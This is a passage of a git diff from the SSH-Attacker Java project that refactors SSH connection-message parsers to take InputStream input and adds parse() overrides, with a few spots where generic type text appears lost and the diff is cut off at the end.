a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java index 30b7ee10f..ad5aa7339 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java @@ -8,16 +8,27 @@ package de.rub.nds.sshattacker.core.protocol.connection.parser; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestAuthAgentMessage; +import java.io.InputStream; public class ChannelRequestAuthAgentMessageParser extends ChannelRequestMessageParser { - public ChannelRequestAuthAgentMessageParser(byte[] array) { - super(array); + /* + public ChannelRequestAuthAgentMessageParser(byte[] array) { + super(array); + } + public ChannelRequestAuthAgentMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelRequestAuthAgentMessageParser(InputStream stream) { + super(stream); } - public ChannelRequestAuthAgentMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelRequestAuthAgentMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java index 60c27af45..0022722fe 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestBreakMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -16,12 +17,22 @@ public class ChannelRequestBreakMessageParser extends ChannelRequestMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestBreakMessageParser(byte[] array) { - super(array); + /* + public ChannelRequestBreakMessageParser(byte[] array) { + super(array); + } + public ChannelRequestBreakMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelRequestBreakMessageParser(InputStream stream) { + super(stream); } - public ChannelRequestBreakMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelRequestBreakMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java index d8dc7a93e..65205fd40 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestEnvMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -19,12 +20,22 @@ public class ChannelRequestEnvMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestEnvMessageParser(byte[] array) { - super(array); + /* + public ChannelRequestEnvMessageParser(byte[] array) { + super(array); + } + public ChannelRequestEnvMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelRequestEnvMessageParser(InputStream stream) { + super(stream); } - public ChannelRequestEnvMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelRequestEnvMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java index fb2dd8774..64875b4c9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestExecMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,22 @@ public class ChannelRequestExecMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestExecMessageParser(byte[] array) { - super(array); + /* + public ChannelRequestExecMessageParser(byte[] array) { + super(array); + } + public ChannelRequestExecMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelRequestExecMessageParser(InputStream stream) { + super(stream); } - public ChannelRequestExecMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelRequestExecMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java index 8f94fac2b..6ef1918ce 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestExitSignalMessage; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -20,12 +21,22 @@ public class ChannelRequestExitSignalMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestExitSignalMessageParser(byte[] array) { - super(array); + /* + public ChannelRequestExitSignalMessageParser(byte[] array) { + super(array); + } + public ChannelRequestExitSignalMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelRequestExitSignalMessageParser(InputStream stream) { + super(stream); } - public ChannelRequestExitSignalMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelRequestExitSignalMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java index 44ac3dfa2..e10ca354c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestExitStatusMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,23 @@ public class ChannelRequestExitStatusMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestExitStatusMessageParser(byte[] array) { - super(array); + /* + public ChannelRequestExitStatusMessageParser(byte[] array) { + super(array); + } + + public ChannelRequestExitStatusMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelRequestExitStatusMessageParser(InputStream stream) { + super(stream); } - public ChannelRequestExitStatusMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelRequestExitStatusMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestMessageParser.java index 36a352c8f..6a098d48b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestMessage; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -19,12 +20,17 @@ public abstract class ChannelRequestMessageParser { - public ChannelRequestShellMessageParser(byte[] array) { + /* public ChannelRequestShellMessageParser(byte[] array) { super(array); } - public ChannelRequestShellMessageParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + public ChannelRequestShellMessageParser(InputStream stream) { + super(stream); + } + + @Override + public void parse(ChannelRequestShellMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java index 2bfc9f550..15f524ef4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestSignalMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -19,12 +20,20 @@ public class ChannelRequestSignalMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestSignalMessageParser(byte[] array) { + /* public ChannelRequestSignalMessageParser(byte[] array) { super(array); } - public ChannelRequestSignalMessageParser(byte[] array, Integer startPosition) { super(array, startPosition); + }*/ + + public ChannelRequestSignalMessageParser(InputStream stream) { + super(stream); + } + + @Override + public void parse(ChannelRequestSignalMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java index 999e42a03..e57c03fa5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestSubsystemMessage; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -19,12 +20,22 @@ public class ChannelRequestSubsystemMessageParser extends ChannelRequestMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestSubsystemMessageParser(byte[] array) { - super(array); + /* + public ChannelRequestSubsystemMessageParser(byte[] array) { + super(array); + } + public ChannelRequestSubsystemMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelRequestSubsystemMessageParser(InputStream stream) { + super(stream); } - public ChannelRequestSubsystemMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelRequestSubsystemMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java index 6f75b25d4..6eaa48bce 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestUnknownMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -16,12 +17,22 @@ public class ChannelRequestUnknownMessageParser extends ChannelRequestMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestUnknownMessageParser(byte[] array) { - super(array); + /* + public ChannelRequestUnknownMessageParser(byte[] array) { + super(array); + } + public ChannelRequestUnknownMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelRequestUnknownMessageParser(InputStream stream) { + super(stream); } - public ChannelRequestUnknownMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelRequestUnknownMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java index 5e7d092a1..a69ec62e1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestWindowChangeMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,22 @@ public class ChannelRequestWindowChangeMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestWindowChangeMessageParser(byte[] array) { - super(array); + /* + public ChannelRequestWindowChangeMessageParser(byte[] array) { + super(array); + } + public ChannelRequestWindowChangeMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelRequestWindowChangeMessageParser(InputStream stream) { + super(stream); } - public ChannelRequestWindowChangeMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelRequestWindowChangeMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java index c00a24482..7f46f5718 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestX11Message; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -19,12 +20,17 @@ public class ChannelRequestX11MessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestX11MessageParser(byte[] array) { - super(array); - } + /* + public ChannelRequestX11MessageParser(byte[] array) { + super(array); + } + public ChannelRequestX11MessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ - public ChannelRequestX11MessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public ChannelRequestX11MessageParser(InputStream stream) { + super(stream); } @Override @@ -80,4 +86,9 @@ protected void parseMessageSpecificContents() { parseX11AuthenticationCookie(); parseX11ScreenNumber(); } + + @Override + public void parse(ChannelRequestX11Message message) { + parseMessageSpecificContents(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java index 0daf89abd..6b824a2ae 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestXonXoffMessage; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,22 @@ public class ChannelRequestXonXoffMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelRequestXonXoffMessageParser(byte[] array) { - super(array); + /* + public ChannelRequestXonXoffMessageParser(byte[] array) { + super(array); + } + public ChannelRequestXonXoffMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelRequestXonXoffMessageParser(InputStream stream) { + super(stream); } - public ChannelRequestXonXoffMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelRequestXonXoffMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java index cb81f2c13..bdbbdb82d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java @@ -8,15 +8,27 @@ package de.rub.nds.sshattacker.core.protocol.connection.parser; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelSuccessMessage; +import java.io.InputStream; public class ChannelSuccessMessageParser extends ChannelMessageParser { - public ChannelSuccessMessageParser(byte[] array) { - super(array); + /* + public ChannelSuccessMessageParser(byte[] array) { + super(array); + } + + public ChannelSuccessMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelSuccessMessageParser(InputStream stream) { + super(stream); } - public ChannelSuccessMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelSuccessMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java index 89df59926..aba08e2cf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelWindowAdjustMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,22 @@ public class ChannelWindowAdjustMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelWindowAdjustMessageParser(byte[] array) { - super(array); + /* + public ChannelWindowAdjustMessageParser(byte[] array) { + super(array); + } + public ChannelWindowAdjustMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelWindowAdjustMessageParser(InputStream stream) { + super(stream); } - public ChannelWindowAdjustMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelWindowAdjustMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java index 78ce9db43..4b5edce64 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestCancelTcpIpForwardMessage; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,12 +19,20 @@ public class GlobalRequestCancelTcpIpForwardMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public GlobalRequestCancelTcpIpForwardMessageParser(byte[] array) { + /* public GlobalRequestCancelTcpIpForwardMessageParser(byte[] array) { super(array); } - public GlobalRequestCancelTcpIpForwardMessageParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + + public GlobalRequestCancelTcpIpForwardMessageParser(InputStream stream) { + super(stream); + } + + @Override + public void parse(GlobalRequestCancelTcpIpForwardMessage message) { + parseMessageSpecificContents(); } private void parseIPAddressToBind() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java index 1aa784775..a1313cbc5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java @@ -9,16 +9,27 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestFailureMessage; +import java.io.InputStream; public class GlobalRequestFailureMessageParser extends SshMessageParser { - public GlobalRequestFailureMessageParser(byte[] array) { - super(array); + /* + public GlobalRequestFailureMessageParser(byte[] array) { + super(array); + } + public GlobalRequestFailureMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public GlobalRequestFailureMessageParser(InputStream stream) { + super(stream); } - public GlobalRequestFailureMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(GlobalRequestFailureMessage globalRequestFailureMessage) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestMessageParser.java index 1302dfed5..9eb187b52 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestMessageParser.java @@ -13,6 +13,7 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestMessage; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -22,12 +23,17 @@ public abstract class GlobalRequestMessageParser { - public GlobalRequestNoMoreSessionsMessageParser(byte[] array) { - super(array); + /* + public GlobalRequestNoMoreSessionsMessageParser(byte[] array) { + super(array); + } + public GlobalRequestNoMoreSessionsMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public GlobalRequestNoMoreSessionsMessageParser(InputStream stream) { + super(stream); } - public GlobalRequestNoMoreSessionsMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(GlobalRequestNoMoreSessionsMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java index 38fbad774..c1204a062 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestOpenSshHostKeysMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,22 @@ public class GlobalRequestOpenSshHostKeysMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public GlobalRequestOpenSshHostKeysMessageParser(final byte[] array) { - super(array); + /* + public GlobalRequestOpenSshHostKeysMessageParser(final byte[] array) { + super(array); + } + public GlobalRequestOpenSshHostKeysMessageParser(final byte[] array, final int startPosition) { + super(array, startPosition); + } + */ + + public GlobalRequestOpenSshHostKeysMessageParser(InputStream stream) { + super(stream); } - public GlobalRequestOpenSshHostKeysMessageParser(final byte[] array, final int startPosition) { - super(array, startPosition); + @Override + public void parse(GlobalRequestOpenSshHostKeysMessage message) { + parseMessageSpecificContents(); } private void parseHostKeys() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java index c812d7916..3ed906693 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java @@ -9,16 +9,27 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestSuccessMessage; +import java.io.InputStream; public class GlobalRequestSuccessMessageParser extends SshMessageParser { - public GlobalRequestSuccessMessageParser(byte[] array) { - super(array); + /* + public GlobalRequestSuccessMessageParser(byte[] array) { + super(array); + } + public GlobalRequestSuccessMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public GlobalRequestSuccessMessageParser(InputStream stream) { + super(stream); } - public GlobalRequestSuccessMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(GlobalRequestSuccessMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java index d8a1b9b11..e2ad5416d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestTcpIpForwardMessage; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,12 +19,23 @@ public class GlobalRequestTcpIpForwardMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public GlobalRequestTcpIpForwardMessageParser(byte[] array) { - super(array); + /* + public GlobalRequestTcpIpForwardMessageParser(byte[] array) { + super(array); + } + public GlobalRequestTcpIpForwardMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + + */ + + public GlobalRequestTcpIpForwardMessageParser(InputStream stream) { + super(stream); } - public GlobalRequestTcpIpForwardMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(GlobalRequestTcpIpForwardMessage message) { + parseMessageSpecificContents(); } private void parseIPAddressToBind() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java index deaec63ab..8e541aa70 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestUnknownMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -16,12 +17,22 @@ public class GlobalRequestUnknownMessageParser extends GlobalRequestMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public GlobalRequestUnknownMessageParser(byte[] array) 